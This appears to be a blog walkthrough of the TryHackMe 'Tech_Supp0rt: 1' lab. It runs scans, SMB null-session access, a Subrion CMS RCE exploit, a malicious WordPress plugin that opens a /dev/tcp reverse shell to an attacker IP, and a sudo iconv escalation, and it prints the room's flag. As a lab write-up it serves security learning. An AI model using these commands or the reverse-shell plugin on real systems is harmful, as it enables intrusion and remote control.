In this walk through, we will be going through the Tech_Supp0rt: 1 room from Tryhackme. This is a Easy rated room on the platform and the objective is to hack into the scammer’s under-development website to foil their plans. So, let’s get started without any delay.
Table of Contents
Machine Info:
Title | Tech_Supp0rt: 1 |
IPaddress | 10.10.112.144 |
Difficulty | Easy |
Objective | Hack into the scammer’s under-development website to foil their plans. |
Enumeration:
- I started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80 (HTTP), 139 and 445 (SMB).
sudo nmap -sS -sV 10.10.112.144
- Next, fired gobuster on the web server running on port 80 and found two interesting directories – /test and /wordpress.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.112.144/ -w ~/Desktop/Wordlist/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.112.144/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2023/11/19 11:21:36 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /index.html (Status: 200) [Size: 11321] /phpinfo.php (Status: 200) [Size: 94941] /server-status (Status: 403) [Size: 278] /test (Status: 301) [Size: 313] [--> http://10.10.112.144/test/] /wordpress (Status: 301) [Size: 318] [--> http://10.10.112.144/wordpress/] =============================================================== 2023/11/19 11:23:44 Finished ===============================================================
- The /test directory had a page with a bunch of pop-ups that are used by the scammers in order to target the victims. This seems like a test page for that.
- Looking into the /wordpress directory reveals a wordpress installation. Enumerated it throughly but can’t find anything worth it on the front-end.
- Next, used the wp-scan to enumerated some usernames and found a hit for one. – support.
wpscan --url http://10.10.112.144/wordpress/ -e u
- I didn’t find anything juicy on the wordpress end. No known exploits for the themes, no vulnerable or misconfigured plugins. So, i started enumerating the SMB shares. Used smbclient and smbmap to list the shares and got a read access in websvr share.
smbclient -L \\10.10.112.144
smbmap -H 10.10.112.144
- Used SMB null session authentication and downloaded the enter.txt file from the websvr share. In there, got a credentials for a potential Subrion installation. We still had no clue about the wordpress creds to go through that route.
smbclient //10.10.112.144/websvr -N
- Decoded the password string with Cyberchef which reveals a password – Scam2021
admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk admin:Scam2021
- I looked online for Subrion and found that it is CMS that is used to build different web apps. I tried to access with /subrion but was unable to to so. Then, i looked into the goals written in enter.txt file where it was written that if we are unable to access the subrion installation with the default path, then we have to do that with panel. Used the below path and got a login panel.
http://10.10.112.144/subrion/panel/
- Logged into the dashboard using our found credentials. As checked the subrion version that is running is 4.2.1.
- Checked the version for known exploits and found that the it is vulnerable to Arbitrary file upload RCE.
searchsploit Subrion CMS 4.2.1
searchsploit -m php/webapps/49876.py
Initial Access:
- Used the exploit to get our initial access.
python3 49876.py -u http://10.10.112.144/subrion/panel/ -l admin -p Scam2021
- Next, looked into the wp-config.php file for potential wordpress creds and got a combo. Bingo!
ls /var/www/html/wordpress
cat /var/www/html/wordpress/wp-config.php
support:ImAScammerLOL!123!
- Logged into the wordpress dashboard using the found credentials.
- Next, i tried to upload our PHP reverse shell in 404.php file but i encountered an error where i was unable to save the file. So, i took a different route.
- I used the below PHP code to develop a malicious WordPress plugin which when activated gives me a reverse connection back to my listener.
<?php /** Plugin Name: WordPress Reverse shell Author: Your Mom **/ exec("/bin/bash -c 'bash -i >& /dev/tcp/10.18.1.78/4444 0>&1'") ?>
- Converted it to a zip file and uploaded it to target.
zip -u revshell.zip revshell.php
- Once activated, i got a connection back to my netcat listener. Great!
- Switched my user to scamsite using the previously found credentials.
Privilege Escalation:
- Next, checked for any sudo misconfiguration using the below command and found that our user can run the iconv binary as root without any password.
sudo -l
- Used an exploit from GTFObins for iconv binary to read the contents of root.txt file and captured our flag.
scamsite@TechSupport:/tmp$ LFILE=/root/root.txt LFILE=/root/root.txt scamsite@TechSupport:/tmp$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE" sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE" 851b8233a8c09400ec30651bd1529bf1ed02790b
Task 1 – Submit Flags
Question 1 – What is the root.txt flag?
851b8233a8c09400ec30651bd1529bf1ed02790b
Also Read: Tryhackme – SQLMAP
Conclusion:
So that was “Tech_Supp0rt: 1” for you. We started off with a regular nmap scan and found 4 ports opened – 22 (SSH), 80 (HTTP), 139 and 445 (SMB). Next, used gobuster to find some hidden directories and got a directory named wordpress with the respective CMS installed. Along with that, looked into the SMB shares and got a file named enter.txt. The file contains creds for Subrion Admin panel. Used the same to access the subrion dashboard. Further, looked for the known exploits of the installed subrion version and found a RCE exploit. Used that to get the initial access on the server. The wp-config file reveals the the creds used to access the WordPress Dashboard. Moving on, once inside the wordpress dashboard, used a malicious worpdress plugin to get shell access and upgraded it to the scamsite user. At last, escalated our privileges by exploiting a sudo misconfiguration for iconv binary using GTFObins exploit and found the root flag and my favorite underwear that was missing for quite some time now. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.